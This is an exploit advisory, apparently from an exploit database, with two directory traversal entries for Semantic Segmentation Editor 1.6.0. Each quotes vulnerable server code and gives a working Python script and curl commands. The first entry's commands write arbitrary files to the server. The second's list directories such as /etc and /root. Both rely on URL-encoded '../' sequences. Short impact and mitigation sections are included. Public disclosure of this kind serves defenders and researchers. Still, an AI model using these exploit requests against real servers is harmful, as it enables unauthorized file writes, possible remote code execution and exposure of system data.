**Exploit Title:** Semantic Segmentation Editor 1.6.0 - Directory Traversal File Upload **Date:** 2025-03-14 **Exploit Author:** Fatih Türüt ([defendzero.com](https://defendzero.com)) **Vendor Homepage:** [Hitachi Automotive & Industry Lab](https://github.com/Hitachi-Automotive-And-Industry-Lab/semantic-segmentation-editor) **Software Download:** [Semantic Segmentation Editor 1.6.0](https://github.com/Hitachi-Automotive-And-Industry-Lab/semantic-segmentation-editor/archive/refs/tags/1.6.0.zip) **Version:** 1.6.0 **Tested on:** macOS 24.3.0 **Category:** Webapps **CVE:** N/A --- ## **Description:** A **directory traversal vulnerability** exists in **Semantic Segmentation Editor 1.6.0** due to improper path validation in the file upload functionality. This flaw allows an attacker to manipulate file paths and write arbitrary files outside the intended directory on the server. ### **Vulnerable Component:** - **File:** `server/main.js` - **Function:** `'saveData'(sample)` - **Issue:** User input is decoded and processed without validating whether the file remains inside the allowed directory. ### **Vulnerable Code:** ```javascript 'saveData'(sample) { if (demoMode) return; const attrs = url.parse(sample.url); let path = decodeURIComponent(attrs.pathname); sample.folder = path.substring(1, path.lastIndexOf("/")); sample.file = path.substring(path.lastIndexOf("/") + 1); // No path validation is performed } ``` --- ## **Proof of Concept (PoC):** An attacker can exploit this vulnerability by crafting a request to save files outside the intended directory. ### **Exploit Script (Python)** ```python import requests # Target file path target_path = "../../../tmp/malicious.txt" encoded_path = target_path.replace("../", "%2f..%2f") url = f"http://target:3000/save/{encoded_path}" content = "Malicious content here" # Send content directly response = requests.post(url, data=content) print(response.text) ``` --- ### **Example curl Command:** ```bash curl -X POST -d "Malicious content here" "http://target:3000/save/%2f..%2f..%2f..%2ftmp%2fmalicious.txt" ``` --- ## **Impact:** Successful exploitation allows an attacker to write arbitrary files to the server, potentially leading to remote code execution (RCE) if an executable file is placed in a web-accessible directory. ### **Mitigation:** The vendor should implement proper path validation and restrict file writes to the intended directory using functions like `path.resolve()` or `path.normalize()` in Node.js. --- ---------------------------------------- Title: Semantic Segmentation Editor 1.6.0 - Directory Traversal Vulnerability Description: A directory traversal vulnerability exists in **Semantic Segmentation Editor 1.6.0** due to improper path validation. An attacker can manipulate the directory browsing endpoint to list arbi trary directories on the server. Source URL: https://github.com/Hitachi-Automotive-And-Industry-Lab/semantic-segmentation-editor Source Name/Email: Halil İbrahim İlhan (halil@defendzero.com) CVEs: N/A Software URL: https://github.com/Hitachi-Automotive-And-Industry-Lab/semantic-segmentation-editor/archive/refs/tags/1.6.0.zip Vulnerable Component: - **File:** server/main.js - **Function:** 'images'(folder, pageIndex, pageLength) - **Issue:** The application decodes user input without validating if it stays within the intended directory scope. Vulnerable Code: ```javascript 'images'(folder, pageIndex, pageLength) { const folderSlash = folder ? decodeURIComponent(folder) + "/" : "/"; const leaf = join(config.imagesFolder, (folderSlash ? folderSlash : "")); // No path validation is performed before accessing the directory const dirs = getDirectories(leaf); const images = getImages(leaf); } ### **Proof of Concept (PoC): An attacker can exploit this vulnerability by sending specially crafted requests. The following Python script demonstrates the exploitation of the vulnerabilit y:** import requests def list_directory(path): """Exploit for directory traversal vulnerability in Semantic Segmentation Editor 1.6.0.""" encoded_path = path.replace("../", "%2f..%2f") url = f"http://target:3000/browse/0/20/{encoded_path}" response = requests.get(url) print(f"Listing contents of: {path}") return response.text if __name__ == "__main__": print(list_directory("../../../etc")) # List /etc directory print(list_directory("../../../root")) # List /root directory ### **Example curl commands:** # List /etc directory curl -i "http://target:3000/browse/0/20/%2f..%2f..%2f..%2fetc" # List /root directory curl -i "http://target:3000/browse/0/20/%2f..%2f..%2f..%2froot"